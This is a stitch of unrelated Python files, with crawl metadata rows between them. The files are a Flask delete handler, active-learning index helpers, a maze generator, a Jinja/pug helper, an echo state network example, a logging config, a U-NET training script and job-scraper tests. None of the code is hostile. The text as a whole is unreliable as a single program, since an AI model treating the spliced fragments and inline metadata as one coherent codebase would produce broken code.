    ###########################################################################
    # DELETE /customers/id
    def delete(self, id):
        '''
        Delete the entity identified by *id*.
        '''
        self.logger.debug('Processing request to delete entity:{0} with id:{1}'.format(self.entity, id))
        try:
            result = self.repo.delete_by_id(id)
            return { 'status' : 'success' }, 200
        except Exception as e:
            self.logger.error('Error in processing DELETE request. %s', str(e))
            return { 'status' : 'error' }, 500
    ###########################################################################
############################################################################### | bbcCorp/py_microservices | src/flask_api_customers/customers.py | customers.py | py | 5,316 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "sys.path.append",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_num... |
23500788401 | from alipy.index import IndexCollection
from alipy.experiment import State
from alipy.data_manipulate import split
from sklearn.preprocessing import StandardScaler
def cancel_step(select_ind, lab, unlab):
    """Undo a query step: move *select_ind* from the labeled set back to the
    unlabeled set and return both as plain Python lists."""
    labeled = IndexCollection(lab)
    unlabeled = IndexCollection(unlab)
    unlabeled.update(select_ind)
    labeled.difference_update(select_ind)
    # materialize the index collections as ordinary lists
    return [idx for idx in labeled], [idx for idx in unlabeled]
def update(select_ind, lab, unlab):
    """Commit a query step: move *select_ind* from the unlabeled set into the
    labeled set and return both as plain Python lists."""
    labeled = IndexCollection(lab)
    unlabeled = IndexCollection(unlab)
    labeled.update(select_ind)
    unlabeled.difference_update(select_ind)
    # materialize the index collections as ordinary lists
    return [idx for idx in labeled], [idx for idx in unlabeled]
def save_state(data, select_ind, current_ac):
    """Wrap one query round (selected index, current accuracy and the
    queried target labels) into an alipy State object."""
    queried_labels = data.loc[select_ind, ['target']]
    return State(select_ind, current_ac, queried_label=queried_labels)
def separate(data):
    """Standardize *data*'s features and build an initially-labeled pool.

    Drops bookkeeping columns, z-scores the remaining feature columns and
    runs alipy's split; the enclosing function returns the standardized
    features / targets of the initially labeled pool.
    """
    # Bug fix: the original test `if 'start' or 'end' in data.columns` is
    # always true ('start' is a truthy literal), so the unconditional drop
    # raised a KeyError whenever those columns were absent.  Drop only the
    # bookkeeping columns that actually exist.
    drop_cols = [c for c in ('start', 'end', 'video', 'color') if c in data.columns]
    if drop_cols:
        data = data.drop(columns=drop_cols)
    y = labels = data['target']
    features = data.drop(columns=['target'])
    # zero-mean / unit-variance scaling of every feature column
    X = features = StandardScaler().fit_transform(features)
    train, test, lab, unlab = split(X, y, test_ratio=0.3, initial_label_rate=0.2, split_count=1, all_class=True,
                                    saving_path='.')
    # materialize the first split's index arrays as plain lists
    train_list = list(train[0])
    test_list = list(test[0])
    lab_list = list(lab[0])
    unlab_list = list(unlab[0])
return X[lab_list], y[lab_list] | weiweian1996/VERSION2.0 | GUI/Function/index_handle.py | index_handle.py | py | 1,941 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "alipy.index.IndexCollection",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "alipy.index.IndexCollection",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "alipy.index.IndexCollection",
"line_number": 20,
"usage_type": "call"
},
{
... |
25926762211 | from random import randint
import numpy
def fill_unassigned(row):
    """Replace every 0 entry of *row* in place with a fresh set id.

    Fresh ids are the smallest positive integers not already used in the row.

    >>> a = numpy.array([1, 0, 5, 5, 0, 2])
    >>> fill_unassigned(a)
    >>> a
    array([1, 3, 5, 5, 4, 2])
    """
    taken = set(row)
    candidate = 1
    for idx in range(len(row)):
        if row[idx] == 0:
            # advance to the next unused positive integer
            while candidate in taken:
                candidate += 1
            row[idx] = candidate
            taken.add(candidate)
def join_sets(row, a, b):
    """Merge set *b* into set *a*: relabel every matching cell of *row* in place.

    >>> a = numpy.array([1, 1, 2, 2, 3, 2])
    >>> join_sets(a, 1, 2)
    >>> a
    array([1, 1, 1, 1, 3, 1])
    """
    # boolean-mask assignment relabels all members of set b at once
    row[row == b] = a
def make_bottom_walls(row):
    """Randomly choose bottom walls for one maze row (Eller's algorithm).

    Returns a boolean array where True means "wall below this cell".  One
    guarded cell per set is always left open so every set can reach the next
    row.  The randint call sequence matches the original implementation.
    """
    remaining = {}
    for label in row:
        remaining[label] = remaining.get(label, 0) + 1
    # pick one guarded (never-walled) cell per set, counted from the set's end
    guarded = {label: randint(0, count - 1) for label, count in remaining.items()}
    walls = numpy.zeros(row.shape, dtype='bool')
    for idx, label in enumerate(row):
        remaining[label] -= 1
        # short-circuit keeps the randint call order identical: no coin flip
        # happens for the guarded cell
        if guarded[label] != remaining[label] and randint(0, 1):
            walls[idx] = True
    return walls
def genmaze_eller(cellcount, heightcount):
    # Generate a maze with Eller's algorithm, one row at a time.
    # Returns a dict with 'width', 'height' and two boolean wall arrays:
    # rwalls[x, y] = wall to the right of cell (x, y), shape (w-1, h)
    # bwalls[x, y] = wall below cell (x, y), shape (w, h-1)
    #
    #  0   1
    # +xxx+xxx+xxx+
    # x   |   |   x
    # +---+---+---+ 0
    # x   |   |   x
    # +xxx+xxx+xxx+
    all_right_walls = numpy.zeros((cellcount - 1, heightcount), dtype=numpy.bool_)
    all_bottom_walls = numpy.zeros((cellcount, heightcount - 1), dtype=numpy.bool_)
    row = numpy.arange(1, cellcount + 1, dtype=numpy.int16)
    rwalls = numpy.zeros((cellcount - 1,), dtype=numpy.bool_)
    rwalls_req = numpy.zeros(rwalls.shape, dtype=numpy.bool_)
    for y in range(heightcount):
        # cells carried down as 0 get fresh set ids
        fill_unassigned(row)
        rwalls[:] = False
        rwalls_req[:] = False
        for x in range(cellcount - 1):
            # a wall is mandatory between two cells of the same set
            # (merging them would create a cycle)
            if row[x] == row[x + 1]:
                rwalls_req[x] = True
                continue
            # different sets: randomly wall them apart or merge them
            if randint(0, 1):
                rwalls[x] = True
            else:
                join_sets(row, row[x], row[x + 1])
        if y == heightcount - 1: # last row condition
            break
        all_right_walls[:, y] = rwalls_req | rwalls
        bwalls = make_bottom_walls(row)
        all_bottom_walls[:, y] = bwalls
        # walled-off cells lose their set membership for the next row
        row[bwalls] = 0
    # walls in last row: merge all remaining distinct sets so the maze
    # is fully connected
    for x in range(cellcount - 1):
        if row[x + 1] != row[x]:
            rwalls[x] = False
            join_sets(row, row[x], row[x + 1])
    all_right_walls[:, heightcount - 1] = rwalls | rwalls_req
    return {
        'width': cellcount,
        'height': heightcount,
        'rwalls': all_right_walls,
        'bwalls': all_bottom_walls,
    }
def debug_draw_maze(maze):
    """Render *maze* (a dict from genmaze_eller) with PIL and display it.

    Debug helper only: opens the system image viewer via Image.show().
    """
    from PIL import Image, ImageDraw
    # Bug fix: the original assigned WorldSize.cell, but no WorldSize class
    # exists in this module, so the function always died with a NameError.
    cell = 20
    w, h = maze['width'], maze['height']
    img = Image.new('RGB', (w * cell, h * cell))
    draw = ImageDraw.Draw(img)
    draw.rectangle((0, 0, w * cell - 1, h * cell - 1), fill=(0, 0, 0))
    # vertical walls: to the right of cell (x, y)
    for y in range(h):
        for x in range(w - 1):
            if maze['rwalls'][x, y]:
                draw.line((
                    x * cell + cell, y * cell,
                    x * cell + cell, y * cell + cell
                ), fill=(255, 255, 255))
    # horizontal walls: below cell (x, y)
    for y in range(h - 1):
        for x in range(w):
            if maze['bwalls'][x, y]:
                draw.line((
                    x * cell, y * cell + cell,
                    x * cell + cell, y * cell + cell
                ), fill=(255, 255, 255))
    img.show()
if __name__ == '__main__':
    # Quick manual check: generate a 30x30 maze and display it.
    maze = genmaze_eller(30, 30)
    debug_draw_maze(maze)
| gitter-badger/tierbots | tierbots/worldgen/maze.py | maze.py | py | 3,577 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "numpy.where",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "random.randint",
"line_num... |
30515350804 | import typing as _
from pathlib import Path
from jinja2 import Environment, FileSystemLoader
from pypugjs.ext.jinja import PyPugJSExtension
asset_folder = ''
def _get_asset(fname: str) -> Path:
return Path(asset_folder, fname)
def _data_with_namespace(data: 'Data', namespace: _.Dict) -> 'DataWithNS':
    # Template helper: re-wrap a plain Data node so attribute lookups can use
    # XML-namespace prefixes (resolved via the given prefix -> URI mapping).
    return DataWithNS(data.data, namespace)
class Data:
def __init__(self, data: _.Dict | _.List | str):
self.data = data
def __repr__(self) -> str:
return f'Data({self.data!r})'
def __eq__(self, other: 'Data') -> bool:
return self.data == getattr(other, 'data', None)
def __getattr__(self, item: _.Any) -> 'Data':
data = self.data
if isinstance(data, dict):
if item in data:
return Data(data[item])
children = data.get('children', [])
return Data([c[item] for c in children if item in c])
elif isinstance(data, list) and len(data) == 1:
data = data[0]
if item in data:
return Data(data[item])
children = data.get('children', [])
return Data([c[item] for c in children if item in c])
return Data('')
def __getitem__(self, item: str) -> str | list['Data']:
data = self.data
if item == '$':
if isinstance(data, str):
return data
elif isinstance(data, dict):
return '\n'.join(data.get('children', []))
elif isinstance(data, list):
if len(data) == 1 and isinstance(data[0], dict):
return '\n'.join(data[0].get('children', []))
return '\n'.join(data)
elif item.startswith('@'):
att_name = item[1:]
if isinstance(data, list):
if len(data) == 1 and isinstance(data[0], dict):
return data[0].get('attributes', {}).get(att_name, '')
return ''
elif isinstance(data, str):
return ''
return data.get('attributes', {}).get(att_name, '')
elif item == '*':
return [Data(d) for d in data] if isinstance(data, list) else []
class DataWithNS(Data):
    """Data wrapper that resolves XML-namespace prefixes on attribute access.

    Attribute names of the form ``prefix__local`` are expanded to Clark
    notation ``{uri}local`` using the ``ns`` prefix-to-URI mapping before the
    ordinary Data lookup runs; results stay namespace-aware.
    """
    def __init__(self, data: dict | list | str, ns: _.Dict):
        super(DataWithNS, self).__init__(data)
        self.ns = ns

    def __getattr__(self, item: str) -> 'Data':
        name = item
        if '__' in item:
            # 'prefix__tag' -> '{namespace-uri}tag'
            prefix, local = item.split('__')
            name = '{' + self.ns.get(prefix, '') + '}' + local
        plain = super(DataWithNS, self).__getattr__(name)
        # keep the namespace mapping attached to the result
        return DataWithNS(plain.data, self.ns)

    def __getitem__(self, item: str) -> str | list['Data']:
        result = super(DataWithNS, self).__getitem__(item)
        if not isinstance(result, list):
            return result
        return [DataWithNS(entry.data, self.ns) for entry in result]
def build_environment(*, template_dir: Path, asset_dir: Path) -> Environment:
    """Create the PugJS-enabled Jinja environment for the given template dir.

    Side effect: stores *asset_dir* in the module-level ``asset_folder`` so
    the ``asset`` template helper can resolve file names against it.
    """
    global asset_folder
    asset_folder = asset_dir
    env = Environment(
        extensions=[PyPugJSExtension],
        loader=FileSystemLoader(template_dir),
        variable_start_string="{%#.-.**",
        variable_end_string="**.-.#%}",
    )
    return env
def build_renderer(jinja_env: Environment) -> _.Callable:
    """Return a ``render(template, **context)`` function bound to *jinja_env*.

    The returned callable loads ``<template>.pug`` and renders it with the
    given context plus the standard helpers (enumerate, asset, dataNS).
    """
    def render(template, **kwargs):
        tmpl = jinja_env.get_template(f'{template}.pug')
        return tmpl.render(enumerate=enumerate,
                           asset=_get_asset,
                           dataNS=_data_with_namespace,
                           **kwargs)
    return render
def build_data(data: _.Dict | _.List | str) -> 'Data':
    # Public constructor: wrap raw parsed data in the Data convenience type.
    return Data(data)
| OnoArnaldo/py-report-generator | src/reportgen/utils/pug_to_xml.py | pug_to_xml.py | py | 3,635 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pathlib.Path",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "pathlib.Path",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "typing.Dict",
"line_num... |
16151353249 | from tqdm import tqdm
import time
import argparse
# defaults: iteration count, seconds per iteration, and max padding width
N = int(1e9)
T = 1e-2
MAX_LEN = 100


def parse_args():
    """Parse command-line options for the rest loop."""
    parser = argparse.ArgumentParser(description='i really wanna have a rest.')
    parser.add_argument('-n', '--iters', type=int, default=N, help='rest iters.')
    parser.add_argument('-f', '--frequency', type=float, default=1/T, help='rest frequency per iter.')
    return parser.parse_args()
def have_a_rest():
    """Print a slowly drifting banner, one line per iteration, with a tqdm bar."""
    args = parse_args()
    padding = ''
    for step in tqdm(range(args.iters)):
        padding = padding + ' '
        if len(padding) > MAX_LEN:
            # NOTE(review): this keeps the tail *after* MAX_LEN characters,
            # which resets the padding to a short string once it overflows;
            # padding[-MAX_LEN:] may have been intended -- preserved as-is.
            padding = padding[MAX_LEN:]
        banner = padding + 'kaizhong faker'
        # alternate between single and doubled output every 5 iterations
        if step % 10 < 5:
            print(banner)
        else:
            print(banner + banner)
        time.sleep(1.0 / args.frequency)
if __name__ == '__main__':
    # script entry point
    have_a_rest()
| I-Doctor/have-a-rest | have-a-rest.py | have-a-rest.py | py | 871 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "tqdm.tqdm",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 34,
"usage_type": "call"
}
] |
844258019 | # coding: utf-8
"""Train an ESN with a recursive least squares filter."""
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import logging
import hyperopt
import hyperopt.mongoexp
import numpy as np
from esn import RlsEsn
from esn.activation_functions import lecun
from esn.preprocessing import add_noise
from . import SuperposedSinusoidExample
logger = logging.getLogger(__name__)
class RlsExample(SuperposedSinusoidExample):
    """Superposed-sinusoid example trained online with an RLS-filter ESN.

    Every other training label is blanked out (NaN) so the reservoir is
    alternately driven without supervision and updated with RLS.
    """
    def __init__(self):
        super(RlsExample, self).__init__()
        self.num_training_samples = 10000
        self.num_test_samples = 500
        self.title = 'Superposed sine; RLS; {} samples'.format(
            self.num_training_samples
        )
        # hand-tuned defaults used when no hyper-parameter search is run
        self.hyper_parameters = {
            'spectral_radius': 1.11,
            'leaking_rate': 0.75,
            'forgetting_factor': 0.99998,
            'autocorrelation_init': 0.1,
            'bias_scale': -0.4,
            'signal_scale': 1.2,
            'state_noise': 0.004,
            'input_noise': 0.007,
        }
        # hyperopt search space, one entry per _train() parameter
        self.search_space = (
            hyperopt.hp.quniform('spectral_radius', 0, 1.5, 0.01),
            hyperopt.hp.quniform('leaking_rate', 0, 1, 0.01),
            hyperopt.hp.quniform('forgetting_factor', 0.98, 1, 0.0001),
            hyperopt.hp.qloguniform('autocorrelation_init', np.log(0.1), np.log(1), 0.0001),
            hyperopt.hp.qnormal('bias_scale', 1, 1, 0.1),
            hyperopt.hp.qnormal('signal_scale', 1, 1, 0.1),
            hyperopt.hp.quniform('state_noise', 1e-10, 1e-2, 1e-10),
            hyperopt.hp.quniform('input_noise', 1e-10, 1e-2, 1e-10),
        )
    def _load_data(self, offset=False):
        """Load the base data, then blank every other training label."""
        super(RlsExample, self)._load_data(offset)
        # remove every other label
        self.training_outputs[1::2] = np.nan
    def _train(
            self,
            spectral_radius,
            leaking_rate,
            forgetting_factor,
            autocorrelation_init,
            bias_scale,
            signal_scale,
            state_noise,
            input_noise,
    ):
        """Train an RLS ESN online and return its free-running predictions
        over the test horizon."""
        self.esn = RlsEsn(
            in_size=1,
            reservoir_size=1000,
            out_size=1,
            spectral_radius=spectral_radius,
            leaking_rate=leaking_rate,
            forgetting_factor=forgetting_factor,
            autocorrelation_init=autocorrelation_init,
            state_noise=state_noise,
            sparsity=0.95,
            initial_transients=300,
            squared_network_state=True,
            activation_function=lecun,
        )
        # scale the bias and signal columns of the input weights separately
        self.esn.W_in *= [bias_scale, signal_scale]

        # train
        self.esn.fit(
            np.array([self.training_inputs[0]]),
            np.array([self.training_outputs[0]])
        )
        for input_date, output_date in zip(
                add_noise(self.training_inputs[1:], input_noise),
                self.training_outputs[1:]
        ):
            if not np.isnan(output_date.item()):
                self.esn.partial_fit(
                    np.array([input_date]),
                    np.array([output_date])
                )
            else:
                # drive reservoir
                self.esn.predict(input_date)

        # test: feed each prediction back as the next input (free running)
        predicted_outputs = [self.esn.predict(self.test_inputs[0])]
        for i in range(len(self.test_inputs)-1):
            predicted_outputs.append(self.esn.predict(predicted_outputs[i]))

        return np.array(predicted_outputs)
| 0x64746b/python-esn | examples/superposed_sinusoid/rls.py | rls.py | py | 3,499 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "hyperopt.hp.quniform",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "hyperopt.hp",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "hyperopt.hp.q... |
27593505084 | import logging
# Logging configuration for the server: a daily-rotated file handler
# attached to the 'server' logger.
from logging.handlers import TimedRotatingFileHandler
import os

# the log file lives next to this module
PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'server.log')

formatter = logging.Formatter(
    '%(asctime)s %(levelname)-8s %(funcName)s %(message)s',
    datefmt='%Y %b %d %H:%M:%S',
)

# rotate once a day, keep a month of backups; delay=True postpones opening
# the file until the first record is actually emitted
file_hand = TimedRotatingFileHandler(
    filename=PATH, when='D', interval=1, encoding='utf-8', delay=True,
    backupCount=31, atTime=None
)
file_hand.setLevel(logging.DEBUG)
file_hand.setFormatter(formatter)

server_logger = logging.getLogger('server')
server_logger.setLevel(logging.DEBUG)
server_logger.addHandler(file_hand)

if __name__ == '__main__':
    # manual smoke test: mirror records to the console as well
    console = logging.StreamHandler()
    console.setFormatter(formatter)
    console.setLevel(logging.DEBUG)
    server_logger.addHandler(console)
    server_logger.info('Тестовый запуск логирования')
| ide007/DB_and_PyQT | Lesson_1/logs/server_log_config.py | server_log_config.py | py | 902 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"li... |
31065262082 | from tensorflow.keras.backend import clear_session
from tensorflow.keras.models import load_model
from tensorflow.keras.callbacks import ModelCheckpoint, Callback as keras_callback
from tensorflow.keras.preprocessing.image import ImageDataGenerator
import numpy as np
from static.models.unet_model import unet
from scipy.io import loadmat
import json
import random
import logging
# This script uses a set of training data assembled into a .mat file consisting of a stack of images
# and a corresponding set of binary masks that label the pixels in the image stacks into two classes.
# The script then initializes a randomized U-NET (using the topology defined in the file model.py).
# It then initiates training using a given batch size and # of epochs, saving the best net at each
# step to the given .hdf5 file path.
#
# Written by Teja Bollu, documented and modified by Brian Kardon
def createDataAugmentationParameters(rotation_range=None, width_shift_range=0.1,
                                     height_shift_range=0.3, zoom_range=0.4, horizontal_flip=True,
                                     vertical_flip=True):
    """Bundle Keras ImageDataGenerator augmentation options into one dict."""
    return dict(
        rotation_range=rotation_range,
        width_shift_range=width_shift_range,
        height_shift_range=height_shift_range,
        zoom_range=zoom_range,
        horizontal_flip=horizontal_flip,
        vertical_flip=vertical_flip,
    )
class PrintLogger:
    """Minimal logger stand-in that writes messages to stdout."""
    def __init__(self):
        pass
    def log(self, lvl, msg):
        # Bug fix: 'self' was missing from the signature, so instance calls
        # like logger.log(level, message) raised TypeError (the instance
        # swallowed the 'lvl' slot).  The level is accepted but ignored.
        print(msg)
def trainNetwork(trained_network_path, training_data_path, start_network_path=None,
                 augment=True, batch_size=10, epochs=512, image_field_name='imageStack',
                 mask_field_name='maskStack', data_augmentation_parameters={},
                 epoch_progress_callback=None, logger=None):
    """Train the U-NET, saving the best network to disk after each epoch.

    augment = whether to randomly augment the training data
    batch_size = size of training batches per epoch
    epochs = number of training epochs (runs through the whole dataset)
    training_data_path = .mat file with the image stack and mask stack
    image_field_name / mask_field_name = fields within the .mat file
    trained_network_path = file path to save the trained network to
    data_augmentation_parameters = kwargs for ImageDataGenerator
        (note: the {} default is only read, never mutated, so it is safe)
    epoch_progress_callback = optional function called at the end of each
        epoch with epoch/loss/accuracy keyword arguments
    logger = object with a .log(level, msg) method; defaults to PrintLogger
    """
    if logger is None:
        logger = PrintLogger()

    # Reset whatever buffers or saved state exists in the keras backend.
    clear_session()

    # Bug fix: the original wrapped the callback *before* checking it for
    # None, so a TrainingProgressCallback(None) was always registered and
    # crashed at the end of the first epoch when no callback was supplied.
    # Only wrap (and later register) a callback that was actually provided.
    if epoch_progress_callback is not None:
        epoch_progress_callback = TrainingProgressCallback(epoch_progress_callback)

    # Load training data
    print('Loading images and masks...')
    data = loadmat(training_data_path)
    img = data[image_field_name]
    mask = data[mask_field_name]

    # Process image and mask data into (samples, x, y, 1) format
    img_shape = img.shape
    num_samples = img_shape[0]
    img_size_x = img_shape[1]
    img_size_y = img_shape[2]
    img = img.reshape(num_samples, img_size_x, img_size_y, 1)
    mask = mask.reshape(num_samples, img_size_x, img_size_y, 1)
    print("...image and mask data loaded.")
    print("Image stack dimensions:", img.shape)
    print(" Mask stack dimensions:", mask.shape)

    print('start path:', start_network_path)
    print('train path:', trained_network_path)

    if augment:
        # identical parameters (and later an identical seed) keep the image
        # and mask augmentations in lockstep
        imgGen = ImageDataGenerator(**data_augmentation_parameters)
        maskGen = ImageDataGenerator(**data_augmentation_parameters)

    if start_network_path is None:
        # Randomize new network structure using architecture in model.py file
        lickbot_net = unet(net_scale = 1)
    else:
        # Load previously trained network from a file
        lickbot_net = load_model(start_network_path)

    # Save the best network to disk whenever an improved network is found.
    model_checkpoint = ModelCheckpoint(str(trained_network_path), monitor='loss', verbose=1, save_best_only=True)
    callback_list = [model_checkpoint]
    if epoch_progress_callback is not None:
        callback_list.append(epoch_progress_callback)

    if augment:
        print("Using automatically augmented training data.")
        # Train network using the augmented dataset
        seed = random.randint(0, 1000000000)
        imgIterator = imgGen.flow(img, seed=seed, shuffle=False, batch_size=batch_size)
        maskIterator = maskGen.flow(mask, seed=seed, shuffle=False, batch_size=batch_size)
        steps_per_epoch = int(num_samples / batch_size)
        lickbot_net.fit(
            ((imgBatch, maskBatch) for imgBatch, maskBatch in zip(imgIterator, maskIterator)),
            steps_per_epoch=steps_per_epoch, # number of batches of generated data per epoch
            epochs=epochs,
            verbose=1,
            callbacks=callback_list
        )
    else:
        lickbot_net.fit(
            img,
            mask,
            epochs=epochs,
            verbose=1,
            callbacks=callback_list
        )
class TrainingProgressCallback(keras_callback):
    """Keras callback that reports per-epoch progress to a user-supplied function.

    At the end of every epoch the progress function is called with the epoch
    number, the current loss and the current accuracy (None when a metric is
    absent from the logs).  If the progress function returns a truthy value,
    training is stopped early via ``self.model.stop_training``.
    """
    def __init__(self, progressFunction):
        """
        :param progressFunction: callable(epoch=int, loss=float|None,
            accuracy=float|None) -> bool; return True to stop training.
        """
        super(TrainingProgressCallback, self).__init__()
        self.logs = []
        self.progressFunction = progressFunction
    def on_epoch_end(self, epoch, logs=None):
        # Keras may pass logs=None; guard so the lookups below are safe
        # (the previous 'in logs' tests raised TypeError on None).
        logs = logs or {}
        loss = logs.get('loss')
        # Older Keras reports 'acc', newer versions report 'accuracy'.
        accuracy = logs.get('acc', logs.get('accuracy'))
        exitFlag = self.progressFunction(epoch=epoch, loss=loss, accuracy=accuracy)
        if exitFlag:
            self.model.stop_training = True
def validateNetwork(trained_network_path, img=None, imgIterator=None, maskIterator=None):
    """Visualize network predictions next to the ground-truth masks.

    Loads the trained network, predicts masks for a validation batch and
    renders a 3-column grid (truth mask | predicted mask | input image).

    Relies on the module-level names ``augment``, ``mask`` and ``load_model``.

    :param trained_network_path: path of the saved network to load
    :param img: image stack used when augmentation is off
    :param imgIterator: augmented image iterator (used when ``augment`` is truthy)
    :param maskIterator: augmented mask iterator (used when ``augment`` is truthy)
    """
    # Load trained network
    lickbot_net = load_model(trained_network_path)
    if augment:
        # NOTE(review): assumes imgIterator/maskIterator are supplied when
        # augment is truthy -- confirm with callers.
        img_validate = imgIterator.next()
        mask_validate = maskIterator.next()
    else:
        print('Using original dataset for visualization')
        img_validate = img
        mask_validate = mask
    # %matplotlib inline
    from matplotlib import pyplot as plt
    from matplotlib import gridspec
    numValidation = img_validate.shape[0]
    # NOTE(review): image sizes are taken from the module-level 'img' stack,
    # which must therefore be loaded even in the augmented case.
    img_shape = img.shape
    img_size_x = img_shape[1]
    img_size_y = img_shape[2]
    img_disp = img_validate.reshape(numValidation, img_size_x, img_size_y)
    mask_disp = mask_validate.reshape(numValidation, img_size_x, img_size_y)
    # Predict once and drop the singleton channel axis for display
    # (the original ran predict() twice and had a no-op 'mask_pred.shape').
    mask_pred = lickbot_net.predict(img_validate).reshape(numValidation, img_size_x, img_size_y)
    scaleFactor = 3
    plt.figure(figsize=(scaleFactor*3, scaleFactor*numValidation))
    plt.subplots_adjust(wspace=0, hspace=0)
    gs = gridspec.GridSpec(nrows=numValidation, ncols=3, width_ratios=[1, 1, 1],
                           wspace=0.0, hspace=0.0, bottom=0, top=1, left=0, right=1)
    for k in range(numValidation):
        plt.subplot(gs[k, 0])
        plt.imshow(mask_disp[k])
        plt.subplot(gs[k, 1])
        plt.imshow(mask_pred[k])
        plt.subplot(gs[k, 2])
        plt.imshow(img_disp[k])
| GoldbergLab/tongueSegmentationServer | NetworkTraining.py | NetworkTraining.py | py | 7,819 | python | en | code | 1 | github-code | 6 | [
{
"api_name": "tensorflow.keras.backend.clear_session",
"line_number": 61,
"usage_type": "call"
},
{
"api_name": "scipy.io.loadmat",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "tensorflow.keras.preprocessing.image.ImageDataGenerator",
"line_number": 87,
"usa... |
73919945469 | import unittest
from bs4 import BeautifulSoup
from src import get_html_script as ghs
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from models.models import JobDataModel
from models import domain_db_mappings as dbm
from models.database_models import JobDataDbModel
import models.database_methods as db_ops
from src.email_generator import TextEmailContent, HtmlEmailContent, generate_full_email_content
from src.email_sender import send_email_to_user, get_data_and_send_email
from datetime import date
Base = declarative_base()
class TestScrapeMethods(unittest.TestCase):
    """Functional tests for the scraping helpers in get_html_script."""

    def test_successfully_scrapes_site(self):
        """A search request reaches the site and echoes query/location in the URL."""
        # Phil comes by, he wants to use this web scraper tool.
        # He plans to see if it can find data on mechanics jobs,
        # and he wants to move to tampa, so he checks monster.
        query = 'mechanic'
        location = 'Tampa'
        site = 'https://www.monster.com'
        results = ghs.scrape_site(site, query, location)
        # Phil sees that he was able to get a successful response.
        self.assertEqual(results.status_code, 200)
        # Phil sees that it did in fact search the site he wanted.
        self.assertTrue(site in results.url)
        # Phil sees that it definitely searched for the type of job he wanted.
        self.assertTrue(query in results.url)
        # He also sees that it certainly searched the location he wanted.
        self.assertTrue(location in results.url)

    def test_successfully_parses_data(self):
        """Parsed results contain clean (non-HTML) fields matching the search."""
        # Mary is a bit more discerning than Phil.
        # She wants to make sure her data makes sense.
        query = 'developer'
        location = 'New York'
        site = 'monster.com'
        location_names = ['New York', 'NY']
        results = ghs.scrape_full_page(site, query, location)
        # Results are not empty. Mary managed to scrape data from a site!
        self.assertTrue(results)
        results_names = [result.title for result in results]
        results_locations = [result.location for result in results]
        results_sites = [result.link for result in results]
        # Mary does not see any html in titles or locations.
        self.assertFalse(any(
            bool(BeautifulSoup(results_name, "html.parser").find())
            for results_name in results_names
        ))
        self.assertFalse(any(
            bool(BeautifulSoup(results_location, "html.parser").find())
            for results_location in results_locations
        ))
        # Mary sees that she did get developer jobs in her results.
        self.assertTrue(any(query in results_name for results_name in results_names))
        # Mary also sees that she got results in New York.
        # (The previous version wrapped a list comprehension of lists inside
        # any(), so the assertion was vacuously true whenever results existed.)
        self.assertTrue(any(
            any(loc in results_location for loc in location_names)
            for results_location in results_locations
        ))
        # Mary lastly sees that all of the job links are, in fact, from monster.
        self.assertTrue(all(site in result_site for result_site in results_sites))
        # Amazed at how far technology has come, a satisfied Mary goes to bed.
class EndToEndHtmlScrapeSaveToDbTest(unittest.TestCase):
    """End-to-end check: scraping persists job rows into the database."""

    def setUp(self):
        # Fresh in-memory database and session for each test.
        self.engine = create_engine('sqlite:///:memory:')
        session_factory = sessionmaker(bind=self.engine)
        self.session = session_factory()
        Base.metadata.create_all(self.engine, tables=[JobDataDbModel.__table__])

    def tearDown(self):
        Base.metadata.drop_all(self.engine)

    def test_scrapes_and_saves_job_data(self):
        job_sites = ['monster.com']
        location = 'utah'
        query = 'hairdresser'
        # The job table starts out empty...
        before_data = self.session.query(JobDataDbModel).all()
        self.assertFalse(before_data)
        ghs.scrape_sites_and_save_jobs(job_sites, query, location, self.session)
        # ...and holds rows after the scrape-and-save run.
        after_data = self.session.query(JobDataDbModel).all()
        self.assertTrue(after_data)
class StoresDataAndSendsEmailTest(unittest.TestCase):
    """Saved job data is emailed once and then flagged as already sent."""

    def setUp(self):
        # Fresh in-memory database and session for each test.
        self.engine = create_engine('sqlite:///:memory:')
        Session = sessionmaker(bind=self.engine)
        self.session = Session()
        Base.metadata.create_all(self.engine, tables=[JobDataDbModel.__table__])

    def tearDown(self):
        Base.metadata.drop_all(self.engine)

    def test_emails_saved_job_data(self):
        # Larry is lazy. He doesn't want to have to keep checking everything himself, so
        # He wants the app to email him only results that haven't already been emailed to him yet.
        query = 'hairdresser'
        location = 'utah'
        site = 'monster.com'
        class_data = ghs.scrape_full_page(site, query, location)
        # His data is saved to the database. It is the exact same data that he had before.
        mapped_data = dbm.map_job_data_models_to_db_models(class_data)
        for data_point in mapped_data:
            self.session.add(data_point)
        self.session.commit()
        # (The original also re-queried all rows into an unused 'saved_data'
        # variable -- a dead database round trip, removed.)
        response = get_data_and_send_email(self.session)
        # Larry has received the email; an empty dict means no send errors.
        self.assertDictEqual(response, {})
